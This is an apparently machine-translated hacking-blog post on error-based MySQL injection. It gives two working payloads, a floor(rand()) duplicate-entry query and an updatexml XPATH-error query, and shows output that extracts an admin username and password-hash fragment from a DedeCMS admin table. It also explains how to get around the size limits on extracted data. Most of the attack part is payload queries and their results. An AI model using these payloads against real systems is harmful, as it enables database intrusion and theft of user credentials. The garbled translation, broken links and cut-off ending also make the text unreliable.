Use of MySQL injection errors

Author: in many cases, xxbing cannot be directly injected. Therefore, with BENCHMARK Delayed Injection, if MySQL error information can be obtained, now we have a more convenient method.
There are two or three methods circulating on the Internet. I recorded one in my BLOG.
Html "target = _ blank>Http://hacknote.com/read? 728. html
Some time ago, we saw another one on t00ls:
Http://hacknote.com/read? 727. html
Similar to this
Mysql> SELECT 1 FROM (select count (*), concat (floor (rand (0) * 2), (SELECT x) a fro
M information_schema.tables group by a) B;
ERROR 1062 (23000): Duplicate entry 1x for key group_key
This method has no requirements for the MySQL version, but only 64 bytes of data can be burst. In this way, big data can only be MID.
Last (only for MySQL 5.1 ++)
Http://hacknote.com/read? 729. html Http://devteev.blogspot.com/2009/10/advanced-sql-injection-lab-full-pack.html
Data is burst by passing parameters that do not conform to the XPATH syntax rules to the ExtractValue function.
For the ExtractValue and UpdateXML functions, see:Http://dev.mysql.com/tech-resources/articles/mysql-5.1-xml.html
Usage:
Mysql> SELECT 1 FROM dede_admin WHERE updatexml (1, (select concat (0x5b, uname, 0x3a
, MID (pwd, 4, 16), 0x5d) FROM dede_admin), 1 );
ERROR 1105 (HY000): XPATH syntax error: [admin: 7a57a5a743894a0e]
This method is more convenient and concise than the previous method. However, this method can only expose 32 bytes of data. Similarly, big data can only be Mid.
Actual test results: